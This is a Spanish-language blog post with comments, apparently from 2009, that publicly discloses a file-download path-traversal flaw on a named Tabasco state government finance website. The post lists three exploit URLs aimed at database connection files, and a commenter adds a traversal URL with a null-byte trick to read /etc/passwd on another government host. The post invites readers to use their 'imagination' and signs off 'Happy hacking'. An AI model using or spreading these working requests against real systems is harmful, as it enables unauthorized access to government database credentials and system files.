Inicio > Uncategorized > Vulnerabilidad en Secretaria de Administracion y Finanzas de Tabasco.

Vulnerabilidad en Secretaria de Administracion y Finanzas de Tabasco.


Empezando la tarde con un buen post, al visitar la pagina de tunich me gusto la forma de postear las vulnerabilidades de paginas de interes social. Aqui ayudando a esa idea posteo esta vulnerabilidad.

La pagina vulnerable: administracion.saf.tabasco.gob.mx
Vulnerabilidad: /scripts/descarga.php?ruta=
Metodo: Full Path Discloure

Explotando:
administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/../../Connections/db_source.php
administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/../../Connections/db_conection.php
administracion.saf.tabasco.gob.mx/scripts/descarga.php?ruta=../../admin/administracion/periodico/index.php

Ahi se las dejo, es cuestion de la imaginacion.
Como dirian por ahi… Happy hacking.

/klanx

Categorías:Uncategorized Etiquetas: , , ,
  1. noviembre 17, 2009 a las 8:53 pm

    D: eres mas hax0r que @Bucio

  2. noviembre 17, 2009 a las 9:07 pm

    😄 lol! naaaah buchito es mi amor de la vida😄

  3. MZN SHadows
    noviembre 13, 2010 a las 12:58 am

    También esta en la de tabasco.gob.mx/scripts/descargar.php?ruta=../../../../../../../../etc/passwd%00.jpg&archivo=archivo.txt

    Haber que se les ocurre

  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: